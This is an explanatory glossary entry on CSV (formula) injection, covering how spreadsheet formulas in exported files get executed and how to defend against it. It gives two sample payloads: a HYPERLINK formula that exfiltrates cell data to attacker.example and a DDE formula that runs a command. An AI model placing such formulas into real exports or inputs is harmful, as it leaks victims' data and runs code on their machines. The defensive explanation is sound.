CSV Injection
What is CSV Injection?
CSV InjectionAn attack that embeds spreadsheet formulas into exported CSV files so that opening the file in Excel or Sheets executes attacker-controlled actions.
CSV injection, sometimes called formula injection, abuses spreadsheet applications that automatically evaluate cells starting with =, +, -, @, or a tab/carriage return. When a web application stores attacker input and later exports it to CSV, the resulting workbook can run DDE, fetch remote URLs, exfiltrate data, or drop malware when a victim opens it. The risk lives in the consumer, not the database, so it is easily missed during code review. Defences are prepending a single quote or other safe prefix to any cell that begins with a dangerous character, validating and escaping fields before export, and warning users before opening untrusted spreadsheets.
● Examples
- 01
A contact form whose name field accepts =HYPERLINK("https://attacker.example/?l="&A2,"Click") and exfiltrates other cells when the export is opened.
- 02
An exported CRM report with =cmd|'/c calc'!A1 that triggers DDE in older Excel versions.
● Frequently asked questions
What is CSV Injection?
An attack that embeds spreadsheet formulas into exported CSV files so that opening the file in Excel or Sheets executes attacker-controlled actions. It belongs to the Attacks & Threats category of cybersecurity.
What does CSV Injection mean?
An attack that embeds spreadsheet formulas into exported CSV files so that opening the file in Excel or Sheets executes attacker-controlled actions.
How do you defend against CSV Injection?
Defences for CSV Injection typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for CSV Injection?
Common alternative names include: Formula injection, Excel macro injection.